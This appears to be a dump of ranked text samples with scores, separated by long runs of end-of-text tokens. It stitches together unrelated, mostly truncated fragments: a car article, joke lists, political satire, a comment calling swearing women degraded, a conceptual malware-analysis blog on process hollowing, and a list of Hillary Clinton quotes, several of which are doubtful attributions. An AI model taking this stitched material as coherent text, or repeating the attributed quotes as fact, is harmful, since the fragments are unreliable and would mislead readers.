faster.’<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 55; Score = 8454144.0 +<|begin_of_text|>Tech / Help + +Deep dive: What makes the Demon so wicked? + +by Patrick Rall + +At a small Detroit media event, SRT powertrain boss Chris Cowland laid out all of the fine details of the 2018 Dodge Challenger SRT Demon. + +The 2018 Challenger Demon had two simple guidelines during development – to run a 9-second quarter mile and to lift the front wheels off of the ground on launch, both in street legal trim. + +Once the Demon was given the green light, Dodge added a few initial requirements, including an engine power increase of 10% over the Hellcat Hemi, and launch forces at least 20% greater than the standard Hellcat Challenger. At the same time, the Demon had to be emission-legal in all 50 states (meeting LEV160), meet pass-by noise requirements, and pass strict SRT durability testing. + +The result is a 4,200 pound muscle car which will run a 9.65 quarter mile and lift the front wheels off of the ground on a hard launch with an 840 horsepower Hemi – which meets all emission and noise requirements set for by the industry and the company. Most importantly, the new Demon is 100% street-friendly, so in addition to being the quickest production car in the world, it can also serve as a comfortable daily driver. + +This was achieved by introducing a new version 6.2-liter supercharged Hemi, with 62% of the content changed from the original Hellcat Hemi — including a new block, crankshaft, connecting rods, pistons, and supercharger assembly. + +That 840 horsepower Hemi is mated to a new 8-speed automatic transmission which has been heavily upgraded with a new torque convertor and trans brake. From that stronger transmission, the power travels through a stronger driveshaft to a stronger rear differential with a steeper gear ratio and stronger axles – reaching the ground by means of the lightweight 18” wheels and the Demon-branded Nitto NT05R tires. + +We knew all of that when the car was introduced back in April, but below, you will find a detailed rundown of how each key component of the drivetrain in the 2018 Dodge Challenger SRT Demon differs from the Hellcat Hemi. + +Induction system + +The Air Grabber Hood is a functional hood scoop system which feeds a high volume of cold air to the airbox, along with dual air catchers in the grille (replacing the fog lights) — all feeding the 14. +================================================================================ +Rank = 56; Score = 8454144.0 +<|begin_of_text|>1. If you throw a cat out a car window, does it become kitty litter? + +2. If corn oil comes from corn, where does baby oil come from? + +3. If there is no God, who pops up the next Kleenex in the box? + +4. When a cow laughs, does milk come out it's nose? + +5. Why do they put braille on the number pads of drive-through teller machines? + +6. How did a fool and his money get together? + +7. If nothing sticks to Teflon, how do they stick Teflon to the pan? + +8. How do they get a deer to cross at that yellow road sign? + +9. If it's tourist season, why can't we shoot them? + +10. What's another word for thesaurus? + +11. Why do they sterilize the needles for lethal injections? + +12. What do they use to ship Styrofoam? + +13. Why is abbreviation such a long word? + +14. Why is there an expiration date on my sour cream container? + +15. Why do kamikaze pilots wear helmets? + +16. How do you know when it is time to tune your bagpipes? + +17. Is it true that cannibals don't eat clowns because they taste funny? + +18. When you choke a smurf, what color do they turn? + +19. Does fuzzy logic tickle? + +20. Do blind Eskimos have seeing-eye sled dogs? + +21. Do they have reserved parking for non-handicapped people at the special olympics? + +22. Why do they call it a TV set when you only get one? + +23. Do radioactive cats have 18 half-lives? + +24. If you shoot a mime, should you use a silencer? + +25. What was the best thing before sliced bread? + +26. Why doesn't glue stick to the inside of the bottle? + +27. Can fat people go skinny-dipping? + +28. Can you be a closet claustrophobic? + +29. Is it possible to be totally partial? + +30. If a book about failures doesn't sell, is it a success? + +31. If the funeral procession is at night, do folks drive with their lights off? + +32. If a stealth bomber crashes in the forest, does it make a sound? + +33. If the cops arrest a mime, do they tell him he has the right to remain silent? + +34. If a parsley farmer is sued, can they garnish his wages? + +35. When it rains, why don't +================================================================================ +Rank = 57; Score = 8355840.0 +<|begin_of_text|>EXPERTS have stressed that of course America is genuinely stupid enough to elect a deranged murder clown as its president. + +Professor Henry Brubaker, from the Institute for Studies, said: “The question ‘are Americans really stupid enough to do this?’ is, in itself, fairly idiotic. + +“In recent years, thanks to some very well made television programmes like Breaking Bad and House of Cards, we may have led ourselves to believe that America is more intelligent than it actually is. + +“More than half the population believes in some form of creationism. More. Than. Half. + +“Meanwhile, many of them are unable to locate their own state on a map, never mind large, well known foreign countries. + +“And then there’s the guns. So many fucking guns. It’s how a great many of them define themselves. That is not a good thing to do with your brain.” + +He added: “Anyway, have a lovely evening.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 58; Score = 8257536.0 +<|begin_of_text|>IN the latest entry about women who use profanities and believe it’s good, partly because men do it, Sven writes: + +Abigail is essentially denying that separate roles apply to men and women, and that good manners are important. In a nutshell, “If it feels good, do it.” + +Women have traditionally been keepers of the home. The home is a place of refuge, a place of safety and comfort, separate from a rough, cruel world. Men ventured out to make a living in that world to preserve the home and hearth. How many men throughout history have felt the soreness and care of a long day at a mine or field or mill melt away as they returned to a loving wife and well-kept house? Introducing swearing into a home pollutes it with the roughness of the outside, which is why a man who swears like a pirate captain’s parrot would hang the curses up outside when he came back to his women folk. It didn’t belong in the house, just like his dirty boots. + +On the deck of a ship and on the floor of an oil rig, the Anglo Saxon word that begins with “F” can be like breathing. I’m not saying it is right, but it is appropriate to the context. Women who swear constantly are degrading themselves and their role as women.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 59; Score = 8159232.0 +<|begin_of_text|>Following Liam Reddy's Herculean performance in goals against Melbourne City on Tuesday www.perthglory.com.au have composed this cheeky list of things they believe their goalkeeper could save. + +The Glory shot-stopper was in vintage form between the posts at AAMI Park, saving two penalties and seven shots to help his side secure a 3-3 draw in a match that was heralded as one of the season's best. + +City, Glory share spoils in Hyundai A-League classic + +The performance rightfully earned Reddy player-of-the-match honours and Glory have taken their appreciation to the next level with this tribute to their No.1. + +1. Mufasa in The Lion King + +The worst part of everyones childhood! If only our big #33 could've been there for Mufasa. + +2. Lizard in the valley of snakes + +In one of the viral videos of the year, this scaley little fella makes an epic dash out of trouble in a valley of venomous snakes. Maybe Liam could've plucked him out of there earlier! + +3. The world famous Kangaroo punch + +A safe hand could've saved our national animal from a little knock on the face! + +4. Jack & Rose on the Titanic + +There was definitely room on that door Rose! + +5. Ned Stark in Game of Thrones + +Everyone's favourite king, Reddy could've come to the rescue in Season 1 of Game of Thrones! + +6. Kevin Muscat from John Kosmina + +One of the iconic images of the Hyundai A-League. + +7. Hand of God in the 1986 FIFA World Cup + +Would the ref work it out this time though? + +8. Steph Curry from downtown + +Could Reddy do it from defence against Golden State? + +9. That Leo Barry mark + +A moment to forget for many West Coast Eagles fans, just needed one palm up there to save the day! + +10. Shannon Noll on Australian Idol in 2003 + +The infamous Australian Idol series that launched enough memes to revive Shannon Noll's career! Would have Nollsy won if Reddy came to the rescue? + +11. Michael Turnbull on the Bachelorette + +He came third in the hunt for Sam Frost's heart, could have Liam got Micky T over the line? #GoalkeepersUnion + +12. Usain Bolt on the home stretch + +The safest hand to pass the baton on the home stretch. + +13. House of Cards' Frank Underwood as Secretary of State + +Cheated from a big position in the +================================================================================ +Rank = 60; Score = 7995392.0 +<|begin_of_text|>See Also: + +• Funniest Hillary Clinton Memes + +• Best Hillary Clinton Jokes + +• Funniest Bill Clinton Memes + +10. "I have to confess that it's crossed my mind that you could not be a Republican and a Christian." + +9. "God bless the America we are trying to create." + +8. "We have a lot of kids who don't know what works means. They think work is a four-letter word." + +7. “He ran a gas station down in St. Louis... No, Mahatma Gandhi was a great leader of the 20th century.” –introducing a quote by Mahatma Gandhi + +6. “Who is going to find out? These women are trash. Nobody’s going to believe them.” –on Bill Clinton’s bimbo eruptions + +5. “If I didn’t kick his ass every day, he wouldn’t be worth anything.” –on Bill Clinton + +4. "I suppose I could have stayed home and baked cookies and had teas, but what I decided to do was to fulfill my profession which I entered before my husband was in public life." + +3. "We are going to take things away from you on behalf of the common good." + +2. "I have said that I'm not running and I'm having a great time being pres — being a first-term senator." —on her presidential ambitions + +1. "I'm not going to have some reporters pawing through our papers.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 61; Score = 7995392.0 +<|begin_of_text|>In a business-driven culture obsessed with success, Christians are often tempted to apply secular business models to their spiritual faith. With around 40 hours of our week spent working, our minds are trained to think about productivity, consumerism and prosperity. Bestselling books on management techniques, inspirational TED talks, growth models, leadership seminars and self-help guides can quickly become our main source of knowledge and information—becoming secondary to the words of Christ. + +Not all secular business advice is bad; just realize that it comes from an entirely different paradigm + +Business vs. Faith: + +Hierarchy vs. Equality + +Industry Standards vs. Theological Beliefs + +Efficiency vs. Holiness + +Board of Directors vs. Spiritual Leaders + +Risk Management vs. Missions + +Loss Prevention vs. Freely Giving + +Marketing vs. Evangelism + +Publicity vs. Outreach + +Customers vs. Communities + +Managers vs. Mentors + +Graphs, Data and Research vs. Prayer, Meditation and Revelation + +Professionalism vs. Love + +Networking vs. Relationships + +Physical Growth vs. Spiritual Maturity + +Salaried Employees vs. Unpaid Volunteers + +Profits vs. Tithing + +Fine Print vs. Grace + +Sales Growth vs. Spiritual Growth + +Success vs. Sacrifice + +Money vs. Christ + +When Christians have a business mindset about their faith, they often mistake efficiency with effectiveness, but not everything is meant to be fast, quick and streamlined. Take prayer for example: + +Almost every church and Christian organization has a website, prayer chain or bulletin page dedicated to people’s prayer requests. The idea is to have as many people praying for you as fast as possible—this is not a bad thing. + +But fewer and fewer Christian ministries are offering a platform that offers the very personal and meaningful opportunity to actually pray with another human being—within an intimate and one-on-one context. This model is considered too inefficient. Matthew 18:20 (NIV) states that “For where two or three gather in my name, there am I with them”. + +Public prayer chains and websites do serve a valuable purpose, and they are a great way to help those in need, but the next time you attend a church or ministry that has a public prayer request list, carefully look it over and analyze what you see—most likely a long list of physical ailments. + +Broken legs, sore throats, allergies, aging grandparents, a disease, sickness, a cold and a litany of other physical problems probably make up about 95% of all public prayer lists. Why? Because +================================================================================ +Rank = 62; Score = 7995392.0 +<|begin_of_text|>Growing up I loved to watch horror movies. In hindsight, they scared the crap out of me probably because I was too young to watch them. One such movie was the 1986 movie Night of the Creeps. Alien slugs enter through peoples' mouths and eventually take over their bodies. A classic body snatchers style movie that had me worried for few days when talking to close to people. Process hollowing (aka process replacement) is a technique malware uses to overwrite a running process with a malicious code. To me it's the technical equivalent of those alien body snatchers. This post explores process hollowing techniques using the Cuckoo Sandbox. + +Process Hollowing (aka Process Replacement) + +In my post Prefetch File Meet Process Hollowing I walked through what process hollowing was but for completeness I’ll copied what I wrote below: + +Malware uses various techniques to covertly execute code on systems. One such technique is process hollowing, which is also known as process replacement. + +The book Practical Malware Analysis states the following in regards to this technique: + +"Process replacement is used when a malware author wants to disguise malware as a legitimate process, without the risk of crashing a process through the use of process injection. + +Key to process replacement is creating a process in a suspended state. This means that the process will be loaded into memory, but the primary thread of the process is suspended. The program will not do anything until an external program resumes the primary thread, causing the program to start running" + +"A malicious process starts a new instance of a legitimate process (such as lsass.exe) in suspended mode. Before resuming it, the executable section( s) are freed and reallocated with malicious code." + +In essence, process hollowing is when a process is started in the suspended state, code is injected into the process to overwrite the original data, and when the process is resumed the injected code is executed. Everything about the process initial appears to reflect the original process. Similar to how everything about the person initially appears to be the original person. Upon closer inspection it reveals that everything is not what it seems. The process behaves differently (such as network communications) and the code inside the process is not the original code. This is very similar to the person behaving differently (such as trying to eat you) and the biological material inside the person is not the original biological material. + +A Common Process Hollowing Technique + +Through observation, the characters in the In the Night of the Creeps figured out how people’s bodies were snatched. Slugs went from +================================================================================ +Rank = 63; Score = 7929856.0 +<|begin_of_text|>Indiana governor Mike Pence will reportedly be Donald Trump’s running mate on the Republican ticket in the 2016 presidential election. Here’s what you need to know about Pence: + +Current Residence : Real America + +: Real America Little-Known Fact : All + +: All Strengths : White, red-faced + +: White, red-faced Weaknesses : Overt prejudices against homosexuals, Syrian refugees, immigrants, welfare recipients, and abortion patients doesn’t bring anything particularly new to Trump campaign + +: Overt prejudices against homosexuals, Syrian refugees, immigrants, welfare recipients, and abortion patients doesn’t bring anything particularly new to Trump campaign Occupation : Former, future talk radio host + +: Former, future talk radio host Inspirational Background Story : Somehow overcame growing nationwide biases against white, heterosexual, Christian men to become governor of Indiana + +: Somehow overcame growing nationwide biases against white, heterosexual, Christian men to become governor of Indiana Level Of Social Conservative : Extra staunchy + +: Extra staunchy Views On LGBT Rights : Believes gay couples are entitled to the same respect as perverted, deviant straight couples + +: Believes gay couples are entitled to the same respect as perverted, deviant straight couples Accomplishments As Governor : Shifted Indiana from oft-overlooked state to lightning rod for condemnation + +: Shifted Indiana from oft-overlooked state to lightning rod for condemnation Gubernatorial Campaign Motto : Leviticus 20:13 + +: Leviticus 20:13 Favorite Sexual Position : Non-penetrative + +: Non-penetrative Title Of Future Autobiography: Running For Dear Life: My Hellish Four Months Inside Trump’s Fractured Mirror-World<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|